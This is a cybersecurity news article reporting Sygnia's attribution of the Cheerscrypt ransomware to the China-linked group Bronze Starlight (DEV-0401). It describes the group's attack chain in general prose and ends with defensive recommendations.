Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10)ⓘ
Bronze Starlight, has been active since mid-2021, in June researchers from Secureworks reported that the APT group is deploying post-intrusion ransomware families to cover up the cyber espionage operations.
The experts observed an activity cluster involving post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0.
“Sygnia recently investigated a Cheerscrypt ransomware attack which utilized Night Sky ransomware TTPs. Further analysis revealed that Cheerscrypt and Night Sky are both rebrands of the same threat group, dubbed ‘Emperor Dragonfly’ by Sygnia.” reads the post published by Sygnia.
“‘Emperor Dragonfly’ (A.K.A. DEV-0401 / BRONZE STARLIGHT) deployed open-source tools that were written by Chinese developers for Chinese users. This reinforces claims that the ‘Emperor Dragonfly’ ransomware operators are based in China. Contrary to publicly available information, Cheerscrypt ransomware makes use of payloads that target both Windows and ESXi environments.”
Cheerscrypt was first analyzed by Trend Micro in May 2022, like other ransomware families employed by the APT group, the Cheerscrypt ransomware encryptor was also created from the code of Babuk ransomware which was leaked online in June 2021.
Unlike other ransomware gangs, the DEV-0401 group doesn’t rely on a network of affiliates, it directly manages every single phase of the attack chain, from the initial access to the data exfiltration.
In attacks that took place in January 2022, the hackers gained initial access to VMware Horizon servers by exploiting critical Log4Shell vulnerability in Apache Log4j, then they dropped a PowerShell payload used to deliver an encrypted Cobalt Strike beacon.
The attackers also delivered three Go-based tools along with the beacon, a keylogger that upload the keystrokes to Alibaba Cloud, a customized version of the internet proxy utility called iox, and the tunneling software NPS.
The attackers used the Impacket open-source tool to perform reconnaissance activities and make lateral movements withing the target network.
The threat actors used the Rclone open-source command-line tool to exfiltrate sensitive information to the cloud storage service Mega, then they delivered the Cheerscrypt ransomware.
Researchers shared Indicators of Compromise (IoCs) along with the following suggestions to defend against DEV-0401’s attacks.
- Identify and patch critical vulnerabilities.
- Limit outbound internet access from servers.
- Protect the virtualization platform.
- Limit lateral movement through the network.
- Protect privileged accounts.